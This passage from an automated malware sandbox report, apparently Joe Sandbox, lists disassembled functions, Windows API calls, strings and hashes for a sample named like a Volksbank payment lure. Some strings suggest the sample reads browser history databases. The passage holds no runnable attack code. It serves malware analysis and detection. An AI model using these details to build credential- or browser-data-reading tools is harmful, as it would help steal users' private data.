                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                                          • String ID: General
                                                                                                                                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                                                                                                                                          • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                                                          • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                                          • API String ID: 0-1953309616
• Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
• Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
APIs
Strings
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
• unknown column "%s" in foreign key definition, xrefs: 00431858
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
• Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
APIs
• memset.MSVCRT ref: 0044A6EB
• memset.MSVCRT ref: 0044A6FB
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
• memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
• Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
• Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
• Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
• free.MSVCRT ref: 0040E9D3
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??3@$free
• String ID:
• API String ID: 2241099983-0
• Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
• Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
• Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
• Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
APIs
• AreFileApisANSI.KERNEL32 ref: 00417497
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
• malloc.MSVCRT ref: 004174BD
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
• free.MSVCRT ref: 004174E4
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharMultiWide$ApisFilefreemalloc
• String ID:
• API String ID: 4053608372-0
• Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
• Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
• Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
• Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
APIs
• GetParent.USER32(?), ref: 0040D453
• GetWindowRect.USER32(?,?), ref: 0040D460
• GetClientRect.USER32(00000000,?), ref: 0040D46B
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
• Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
• ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
• memset.MSVCRT ref: 004450CD
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                                                                          • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                                                                                          • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                                                                                          • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                                                                                          • String ID: AE
                                                                                                                                                                                                                                          • API String ID: 3548547718-685266089
                                                                                                                                                                                                                                          • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                          • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                                                                                                                                          • String ID: @@@@$History
                                                                                                                                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                                                                                                                                          • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
• Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
• Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
• Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
• Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
• Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
• Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
APIs
• memset.MSVCRT ref: 0040E770
• SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: MessageSendmemset
• String ID: AE$"
• API String ID: 568519121-1989281832
• Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
• Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
• Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
• Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
• Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
• Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
• Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
• Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
• Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
• Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
• Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
• Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
• Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
• Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
• Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
• Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
